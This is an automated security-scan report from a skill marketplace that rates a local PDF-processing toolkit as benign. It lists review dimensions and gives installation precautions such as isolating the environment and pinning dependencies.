Skillv0.1.0

ClawScan security

pdf · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignApr 15, 2026, 1:35 PM

Verdict: benign
Confidence: high
Model: gpt-5-mini
Summary: The skill's code, instructions, and requirements are consistent with a PDF-processing toolkit and do not request unrelated credentials or hidden network endpoints.
Guidance: This skill appears internally consistent for local PDF processing, but review these points before installing or running it: (1) Dependencies: the scripts require many Python packages and some command-line tools (poppler/qpdf/pdftk, tesseract) — install them in a controlled environment (virtualenv/container). (2) Monkeypatch: the fillable-fields script monkeypatches a pypdf method to work around a library bug — this changes library behavior in-process; run it on trusted systems and test with non-sensitive PDFs first. (3) Untrusted PDFs: parsing maliciously crafted PDFs can exploit vulnerabilities in PDF libraries; avoid processing sensitive documents on untrusted code or without updates/patches. (4) Manual validation steps: forms.md requires manual image inspection and iterative fixes — do not skip those steps or blindly accept automated bounding boxes. (5) License: the included LICENSE.txt is restrictive; confirm the license terms are compatible with your intended usage. Recommended precautions: run in an isolated environment, install and pin known-good dependency versions, inspect/try scripts on sample PDFs, and do not feed highly sensitive documents until you have validated behavior.

Review Dimensions

Purpose & Capability: okThe name/description (PDF extraction, creation, merging, forms) matches the included SKILL.md and the provided scripts (form extraction/filling, conversion to images, validation). No unrelated environment variables, binaries, or config paths are requested.
Instruction Scope: noteRuntime instructions are focused on local PDF manipulation and running the included Python scripts. They do require the user/agent to run scripts and to perform manual visual validation for non-fillable forms. Note: scripts mutate library behavior (monkeypatch for pypdf get_inherited) to work around a known pypdf bug — this is explained in the code but is a behavior you should be aware of because it modifies a library's runtime method for the process.
Install Mechanism: okNo install spec is provided (instruction-only skill with bundled scripts). That keeps risk low; however the skill relies on several external Python and CLI packages (pypdf, pdfplumber, reportlab, pdf2image, poppler tools, pytesseract, Pillow, etc.) which must be installed by the operator. There is no automatic download of arbitrary code from external URLs.
Credentials: okThe skill requires no environment variables, credentials, or special config paths. All operations are local and operate on user-supplied PDF files.
Persistence & Privilege: okThe skill does not request persistent/always-on inclusion and does not modify other skills or system-wide settings. It runs scripts locally and writes only the output files the user requests.